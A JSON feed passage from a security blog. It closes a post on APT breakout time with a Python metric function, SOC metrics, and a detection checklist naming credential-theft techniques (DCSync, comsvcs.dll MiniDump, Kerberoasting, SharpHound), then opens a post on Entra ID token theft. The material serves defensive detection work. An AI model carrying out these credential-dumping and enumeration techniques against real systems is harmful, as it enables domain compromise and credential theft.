href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-5--building-a-breakout-timer-metric-for-your-soc\" class=\"hash-link\" aria-label=\"Direct link to Section 5: Building a Breakout Timer Metric for Your SOC\" title=\"Direct link to Section 5: Building a Breakout Timer Metric for Your SOC\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"measuring-breakout-time-internally\">Measuring Breakout Time Internally<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#measuring-breakout-time-internally\" class=\"hash-link\" aria-label=\"Direct link to Measuring Breakout Time Internally\" title=\"Direct link to Measuring Breakout Time Internally\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> pandas </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> pd</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> datetime </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> datetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" 
style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">calculate_breakout_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    incident_events: DataFrame with columns:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">      timestamp, host, event_type, description</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    initial_host </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        
incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">isin</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'c2_beacon'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'payload_execution'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'malicious_macro'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sort_values</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">iloc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 
92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    t_access </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> initial_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    source_host </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> initial_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    lateral_events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span 
class=\"token plain\">incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">!=</span><span class=\"token plain\"> source_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">isin</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'lateral_movement'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'pass_the_hash'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'remote_execution'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'new_beacon'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sort_values</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> lateral_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">empty</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    t_lateral </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> lateral_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">iloc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    breakout_seconds </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">t_lateral </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> t_access</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span 
class=\"token plain\">total_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'breakout_minutes'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> breakout_seconds </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">60</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> source_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'first_lateral_host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> lateral_events</span><span class=\"token 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">iloc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p>After 5–10 incidents you have an internal breakout time distribution  more relevant than industry averages because it reflects your specific environment and attacker targeting patterns.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-three-soc-metrics-that-map-directly-to-this\">The Three SOC Metrics That Map Directly to This<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#the-three-soc-metrics-that-map-directly-to-this\" class=\"hash-link\" aria-label=\"Direct link to The Three SOC Metrics That Map Directly to This\" title=\"Direct link to The Three SOC Metrics That Map Directly to This\" translate=\"no\">​</a></h3>\n<p><strong>1. MTTD for lateral movement precursors</strong></p>\n<p>Not generic malware MTTD  specifically: time from first C2 beacon timestamp to first human acknowledgment of active intrusion. Measure by pulling the earliest related event timestamp in every IR timeline and comparing to the first ticket creation timestamp.</p>\n<p><strong>2. Alert-to-containment gap</strong></p>\n<!-- -->\n<p>Most of the gap is not investigation time  it is <strong>approval time</strong>. 
Automating containment for specific high-confidence events (confirmed C2 beacon, confirmed LSASS dump, confirmed DCSync) eliminates approval latency for the highest-severity triggers.</p>\n<p><strong>3. Detection checkpoint coverage rate</strong></p>\n<p>Of the three checkpoints above, what percentage of test intrusions trigger at least one alert at each? Run quarterly using purple team exercises or Atomic Red Team automation.</p>\n<table><thead><tr><th>Checkpoint</th><th>Target Coverage</th></tr></thead><tbody><tr><td>Checkpoint 3: Credential dumping</td><td>100%</td></tr><tr><td>Checkpoint 2: BloodHound collection</td><td>80%</td></tr><tr><td>Checkpoint 1: C2 beaconing</td><td>60%</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"making-the-investment-case\">Making the Investment Case<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#making-the-investment-case\" class=\"hash-link\" aria-label=\"Direct link to Making the Investment Case\" title=\"Direct link to Making the Investment Case\" translate=\"no\">​</a></h3>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Current state:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Median attacker breakout time (internal):    47 minutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Current alert-to-containment gap:            4.5 hours</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Coverage gap:                                −4 hours 13 minutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Probability of containing before DA access:  ~0%</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">With automated containment for Checkpoint 3 events:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Alert-to-containment gap (automated):        4 minutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Coverage gap:                                +43 minutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Probability of containing before DA access:  ~85% (estimated)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Investment required:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  - SOAR playbook development:     40 hours engineering</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  - Runbook approval changes:      governance approval</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  - Quarterly validation:          2 days/quarter</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"summary-the-operational-checklist\">Summary: The 
Operational Checklist<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#summary-the-operational-checklist\" class=\"hash-link\" aria-label=\"Direct link to Summary: The Operational Checklist\" title=\"Direct link to Summary: The Operational Checklist\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"immediate-actions-this-week\">Immediate actions (this week)<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#immediate-actions-this-week\" class=\"hash-link\" aria-label=\"Direct link to Immediate actions (this week)\" title=\"Direct link to Immediate actions (this week)\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Enable Event ID 1644 LDAP diagnostic logging on all Domain Controllers</li>\n<li class=\"\">Enable <code>Audit Directory Service Access</code> for success events on DCs</li>\n<li class=\"\">Deploy the DCSync Sigma rule - zero false positives in standard environments</li>\n<li class=\"\">Add <code>comsvcs.dll MiniDump</code> process creation detection - no legitimate use case</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"30-day-actions\">30-day actions<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#30-day-actions\" class=\"hash-link\" aria-label=\"Direct link to 30-day actions\" title=\"Direct link to 30-day actions\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Baseline LDAP query rates per source workstation to enable BloodHound detection</li>\n<li class=\"\">Run BloodHound against your own environment - enumerate every DA path</li>\n<li class=\"\">Identify all Kerberoastable accounts and migrate to gMSA or 30+ char random passwords</li>\n<li class=\"\">Audit <code>msDS-SupportedEncryptionTypes</code> - disable RC4 where possible</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" 
id=\"quarterly\">Quarterly<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#quarterly\" class=\"hash-link\" aria-label=\"Direct link to Quarterly\" title=\"Direct link to Quarterly\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Run SharpHound in your environment and verify your detection triggers</li>\n<li class=\"\">Execute comsvcs.dll dump against a test host and verify your SIEM alerts</li>\n<li class=\"\">Simulate a DCSync from a non-DC host and verify your 4662 alert fires</li>\n<li class=\"\">Measure your alert-to-containment gap for the last 5 real incidents</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-fundamental-shift\">The fundamental shift<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#the-fundamental-shift\" class=\"hash-link\" aria-label=\"Direct link to The fundamental shift\" title=\"Direct link to The fundamental shift\" translate=\"no\">​</a></h3>\n<p>Detection built around human-in-the-loop review cannot keep pace with adversary breakout times under 60 minutes. The architecture that works:</p>\n<blockquote>\n<p><strong>High-fidelity automated detection → automated containment for specific trigger events → human review of containment decision in parallel, not in series.</strong></p>\n</blockquote>\n<p>The three events (DCSync, comsvcs MiniDump, confirmed C2 beacon) have near-zero false positive rates when properly tuned. 
Automated containment on these events will generate almost no incorrect isolations while dramatically compressing your exposure window.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references-and-further-reading\">References and Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#references-and-further-reading\" class=\"hash-link\" aria-label=\"Direct link to References and Further Reading\" title=\"Direct link to References and Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\">CrowdStrike 2024 Global Threat Report - breakout time statistics, eCrime methodology</li>\n<li class=\"\">DFIR Report (dfirreport.com) - full intrusion timelines with raw telemetry and IOCs</li>\n<li class=\"\">MITRE ATT&amp;CK T1021.003 (DCOM lateral movement) - documented adversary procedures</li>\n<li class=\"\">Harmj0y BloodHound documentation - ACL abuse paths and enumeration methodology</li>\n<li class=\"\">SysWhispers2/3 GitHub - direct syscall implementation reference</li>\n<li class=\"\">Elastic Security Labs - JARM-based infrastructure detection methodology</li>\n<li class=\"\">Microsoft MSDN - Event ID 4662, 4769, 1644 field documentation</li>\n<li class=\"\">Impacket GitHub - reference implementation of PTH, DCSync, DCOM attack tooling</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/how-attackers-abuse-entra-id-oauth-without-malware\">How Attackers Abuse Entra ID &amp; OAuth Without Malware</a> - identity-layer attacks that follow the same initial access patterns</li>\n<li class=\"\"><a 
class=\"\" href=\"https://inferencedefense.com/academy/mfa-bypass-device-code-phishing-token-replay-conditional-access\">MFA Bypass in 2025–2026: Device Code Phishing, Token Replay</a>  how attackers maintain persistence after domain compromise</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/windows-event-log-architecture-siem-missing-events\">Windows Event Log Architecture: Why Your SIEM Is Missing 30% of Events</a>  close the telemetry gaps attackers exploit in this timeline</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/network-forensics-lateral-movement-dns-netflow-auth-logs\">Network Forensics Without a Tap</a>  reconstruct lateral movement when EDR is disabled or unavailable</li>\n</ul>\n<hr>\n<p><em>All commands and code in this post describe attacker techniques documented in public DFIR reports and academic research. They are presented for defensive detection purposes only. Running these techniques against systems you do not own or have explicit written authorization to test is illegal.</em></p>",
            "url": "https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours",
            "title": "How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours",
            "summary": "A technical deep-dive into the attacker timeline from initial foothold to Domain Admin  with exact commands, telemetry gaps, and detection rules for SOC teams.",
            "date_modified": "2026-04-17T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "threat-intelligence",
                "active-directory",
                "lateral-movement",
                "detection-engineering",
                "incident-response",
                "cobalt-strike",
                "kerberoasting",
                "dcsync"
            ]
        },
        {
            "id": "https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware",
            "content_html": "<blockquote>\n<p><strong>Who this is for:</strong> Security analysts who want to understand exact attack mechanics, and CISOs who need to know why their EDR gives them false confidence against this threat class. Every technique here has been observed in real-world intrusions  no theoretical fluff.</p>\n</blockquote>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-uncomfortable-truth-about-modern-identity-attacks\">The Uncomfortable Truth About Modern Identity Attacks<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-uncomfortable-truth-about-modern-identity-attacks\" class=\"hash-link\" aria-label=\"Direct link to The Uncomfortable Truth About Modern Identity Attacks\" title=\"Direct link to The Uncomfortable Truth About Modern Identity Attacks\" translate=\"no\">​</a></h2>\n<p><strong>Your EDR is blind to most of this.</strong></p>\n<p>When a threat actor steals a valid OAuth token and moves laterally through your Microsoft 365 tenant, no malware is dropped, no exploit fires, no suspicious process spawns. The attacker looks exactly like a legitimate user  because to every security control watching for behavior, they are one. They authenticated successfully. They have a valid session. They are inside.</p>\n<p>This is the defining characteristic of the modern identity attack surface: the weapon is authentication itself.</p>\n<p>In the past three years, attacks on Entra ID (formerly Azure Active Directory) and the OAuth 2.0 layer sitting on top of it have become the dominant initial access vector in enterprise intrusions. 
The 2024 Microsoft breach by Midnight Blizzard, the Cloudflare intrusion, dozens of ransomware campaigns - all of them started not with a zero-day or a malicious attachment, but with an identity-layer compromise that existing controls simply weren't designed to catch.</p>\n<p>This post breaks down exactly how these attacks work, what the attacker sees, what telemetry exists to detect them, and what actionable controls reduce your exposure. We go deep.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-1-token-theft-and-session-hijacking--the-attack-your-edr-cannot-see\">Section 1: Token Theft and Session Hijacking - The Attack Your EDR Cannot See<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-1-token-theft-and-session-hijacking--the-attack-your-edr-cannot-see\" class=\"hash-link\" aria-label=\"Direct link to Section 1: Token Theft and Session Hijacking - The Attack Your EDR Cannot See\" title=\"Direct link to Section 1: Token Theft and Session Hijacking - The Attack Your EDR Cannot See\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-a-token-actually-is\">What a Token Actually Is<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#what-a-token-actually-is\" class=\"hash-link\" aria-label=\"Direct link to What a Token Actually Is\" title=\"Direct link to What a Token Actually Is\" translate=\"no\">​</a></h3>\n<p>Before understanding how tokens get stolen, you need to understand what makes them valuable.</p>\n<p>When a user authenticates to Microsoft 365, Entra ID issues several tokens:</p>\n<ul>\n<li class=\"\"><strong>Access Token</strong> - a short-lived JWT (typically 60–75 minutes) that grants access to a specific resource. 
